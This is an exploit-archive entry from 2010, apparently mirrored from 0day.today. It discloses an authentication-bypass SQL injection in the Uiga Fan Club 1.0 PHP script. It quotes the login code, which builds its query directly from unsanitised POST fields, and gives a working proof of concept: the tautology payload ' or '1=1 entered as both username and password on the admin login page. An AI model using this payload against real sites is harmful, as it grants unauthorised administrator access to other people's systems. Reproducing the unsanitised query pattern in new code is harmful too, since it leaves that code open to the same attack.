id: 11118
date: 02/27/2010
title: Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
author: cr4wl3r
cves: 

==============================================================
Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
==============================================================

# Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
###########################################################################
# Author: cr4wl3r
# Download: http://www.scriptdevelopers.net/download/uigafanclub.zip
###########################################################################
#if (isset($_POST['admin_name']))
# {
# $admin_name=$_POST['admin_name'];
# $admin_password=$_POST['admin_password'];
#
#
# if(empty($admin_name))
# {
# $errorMessage=warning." Username is empty!";
# }
# elseif(empty($admin_password))
# {
# $errorMessage=warning." Password is empty!";
# }
#
#
# else
# {
# $sql="SELECT *
#      FROM admin
#      WHERE admin_name='$admin_name' and admin_password='$admin_password'";
#
###########################################################################
 
###############################################
PoC: [path]/admin/admin_login.php
 
     Username: ' or '1=1
     password: ' or '1=1
###############################################



#  0day.today [2023-03-27]  #